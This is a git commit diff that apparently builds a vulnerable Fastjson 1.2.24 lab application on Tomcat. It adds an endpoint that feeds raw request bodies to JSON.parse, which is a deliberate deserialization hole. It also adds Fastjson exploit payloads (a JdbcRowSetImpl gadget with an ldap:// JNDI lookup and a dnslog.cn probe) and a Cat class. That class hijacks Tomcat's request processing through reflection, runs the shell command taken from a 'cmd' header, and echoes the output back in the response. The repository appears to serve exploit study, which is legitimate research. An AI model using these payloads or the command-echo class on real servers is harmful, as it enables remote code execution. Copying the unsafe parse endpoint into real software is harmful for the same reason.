Controller/Fastjson.java

SummerSec · SummerSec · commit 947ce002abc0 · 2021-06-22T17:42:54.000+08:00
diff --git a/Rce_Echo/TomcatEcho/pom.xml b/Rce_Echo/TomcatEcho/pom.xml
@@ -45,6 +45,11 @@
             <groupId>org.apache.tomcat.embed</groupId>
             <artifactId>tomcat-embed-jasper</artifactId>
         </dependency>
+        <dependency>
+            <groupId>com.alibaba</groupId>
+            <artifactId>fastjson</artifactId>
+            <version>1.2.24</version>
+        </dependency>
     </dependencies>
 
     <build>
diff --git a/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/Fastjson.java b/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/Fastjson.java
@@ -0,0 +1,68 @@
+package summersec.echo.Controller;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.JSONObject;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.RequestBody;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestMethod;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+import javax.servlet.http.HttpServletRequest;
+import java.net.URLDecoder;
+
+/**
+ * @ClassName: Fastjson
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/6/22 16:24
+ * @Version: v1.0.0
+ * @Description:
+ **/
+@Controller
+public class Fastjson {
+    @RequestMapping(value = "fastjson")
+    public String fastjsonvul(){
+        return "fastjson";
+    }
+
+    @RequestMapping(value = "parse",method = RequestMethod.POST)
+    @ResponseBody
+    public String vuldemo(@RequestBody String  request){
+        System.out.println(request);
+        String result = request.substring(9,request.length());
+        System.out.println(URLDecoder.decode(result));
+        JSON.parse(URLDecoder.decode(result));
+        return "parse is ok!";
+    }
+
+    public static void main(String[] args) {
+        String json = "{\"@type\":\"java.net.Inet4Address\",\"val\":\"wgddy2.dnslog.cn\"}";
+        String json1 = "{\n" +
+                "    \"a\":{\n" +
+                "        \"@type\":\"java.lang.Class\",\n" +
+                "        \"val\":\"com.sun.rowset.JdbcRowSetImpl\"\n" +
+                "    },\n" +
+                "    \"b\":{\n" +
+                "        \"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\n" +
+                "        \"dataSourceName\":\"ldap://127.0.0.1:1389/Cat\",\n" +
+                "        \"autoCommit\":\"true\"\n" +
+                "    }\n" +
+                "}";
+        JSON.parse(json1);
+    }
+
+//    {"@type":"java.net.Inet4Address","val":"cr8s2f.dnslog.cn"}
+//{
+//    "a":{
+//    "@type":"java.lang.Class",
+//            "val":"com.sun.rowset.JdbcRowSetImpl"
+//},
+//    "b":{
+//    "@type":"com.sun.rowset.JdbcRowSetImpl",
+//            "dataSourceName":"ldap://127.0.0.1:6666/Test",
+//            "autoCommit":"true"
+//}
+//}
+
+}
diff --git a/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Demo/Cat.java b/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Demo/Cat.java
@@ -0,0 +1,80 @@
+package summersec.echo.Demo;
+
+/**
+ * @ClassName: Cat
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/6/22 17:08
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class Cat {
+    public Cat()throws Exception{
+        boolean flag = false;
+        ThreadGroup group = Thread.currentThread().getThreadGroup();
+        java.lang.reflect.Field f = group.getClass().getDeclaredField("threads");
+        f.setAccessible(true);
+        Thread[] threads = (Thread[]) f.get(group);
+        for(int i = 0; i < threads.length; i++) {
+            try{
+                Thread t = threads[i];
+                if (t == null) continue;
+                String str = t.getName();
+                if (str.contains("exec") || !str.contains("http")) continue;
+                f = t.getClass().getDeclaredField("target");
+                f.setAccessible(true);
+                Object obj = f.get(t);
+                if (!(obj instanceof Runnable)) continue;
+                f = obj.getClass().getDeclaredField("this$0");
+                f.setAccessible(true);
+                obj = f.get(obj);
+                try{
+                    f = obj.getClass().getDeclaredField("handler");
+                }catch (NoSuchFieldException e){
+                    f = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");
+                }
+                f.setAccessible(true);
+                obj = f.get(obj);
+                try{
+                    f = obj.getClass().getSuperclass().getDeclaredField("global");
+                }catch(NoSuchFieldException e){
+                    f = obj.getClass().getDeclaredField("global");
+                }
+                f.setAccessible(true);
+                obj = f.get(obj);
+                f = obj.getClass().getDeclaredField("processors");
+                f.setAccessible(true);
+                java.util.List processors = (java.util.List)(f.get(obj));
+                for(int j = 0; j < processors.size(); ++j) {
+                    Object processor = processors.get(j);
+                    f = processor.getClass().getDeclaredField("req");
+                    f.setAccessible(true);
+                    Object req = f.get(processor);
+                    Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
+                    str = (String)req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"});
+                    if (str != null && !str.isEmpty()) {
+                        resp.getClass().getMethod("setStatus", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(200)});
+                        String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", str} : new String[]{"/bin/sh", "-c", str};
+                        String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
+                        byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter("\\A").next().getBytes(charsetName);
+                        try {
+                            Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
+                            obj = cls.newInstance();
+                            cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});
+                            resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
+                        } catch (NoSuchMethodException var5) {
+                            Class cls = Class.forName("java.nio.ByteBuffer");
+                            obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result});
+                            resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
+                        }
+                        flag = true;
+                    }
+                    if (flag) break;
+                }
+                if (flag)  break;
+            }catch(Exception e){
+                continue;
+            }
+        }
+    }
+}
diff --git a/Rce_Echo/TomcatEcho/src/main/webapp/WEB-INF/jsp/fastjson.jsp b/Rce_Echo/TomcatEcho/src/main/webapp/WEB-INF/jsp/fastjson.jsp
@@ -0,0 +1,37 @@
+<%--
+  Created by Bearcat
+  User: Administrator
+  Date: 2018/10/15 0015
+  Time: 20:36
+  To change this template use File | Settings | File Templates.
+--%>
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<html>
+<head>
+    <title>FastJson漏洞演示程序</title>
+    <style type="text/css">
+        #textJson{
+            width: 800px;
+            margin-right: 5px;
+            margin-top: 30px;
+        }
+        #logo{
+            margin-top: 100px;
+            text-align: center;
+        }
+        #img{
+            width: 400px;
+            height: 360px;
+        }
+    </style>
+</head>
+<body>
+<div id="logo">
+    <img src="/logo.jpg" id="img"/>
+    <form action="parse" method="post">
+        <input type="text" name="textJson" id="textJson" value="{'age':44,'name':'Bearcat','sex':'male'}">
+        <input type="submit" value="提交">
+    </form>
+</div>
+</body>
+</html>
diff --git a/Rce_Echo/TomcatEcho/src/main/webapp/WEB-INF/jsp/index.jsp b/Rce_Echo/TomcatEcho/src/main/webapp/WEB-INF/jsp/index.jsp
@@ -1,16 +1,37 @@
 <%--
-  Created by IntelliJ IDEA.
-  User: Samny
-  Date: 2021/6/16
-  Time: 17:24
+  Created by Bearcat
+  User: Administrator
+  Date: 2018/10/15 0015
+  Time: 20:36
   To change this template use File | Settings | File Templates.
 --%>
 <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 <html>
 <head>
-    <title>TomcatEcho</title>
+    <title>FastJson漏洞演示程序</title>
+    <style type="text/css">
+        #textJson{
+            width: 800px;
+            margin-right: 5px;
+            margin-top: 30px;
+        }
+        #logo{
+            margin-top: 100px;
+            text-align: center;
+        }
+        #img{
+            width: 400px;
+            height: 360px;
+        }
+    </style>
 </head>
 <body>
-<h1>hello world</h1>
+<div id="logo">
+    <img src="/logo.jpg" id="img"/>
+    <form action="parse" method="post">
+        <input type="text" name="textJson" id="textJson" value="{'age':44,'name':'Bearcat','sex':'male'}">
+        <input type="submit" value="提交">
+    </form>
+</div>
 </body>
 </html>
diff --git a/Rce_Echo/TomcatEcho/src/main/webapp/WEB-INF/jsp/logo.jpg b/Rce_Echo/TomcatEcho/src/main/webapp/WEB-INF/jsp/logo.jpg
diff --git a/Rce_Echo/TomcatEcho/target/classes/META-INF/TomcatEcho.kotlin_module b/Rce_Echo/TomcatEcho/target/classes/META-INF/TomcatEcho.kotlin_module
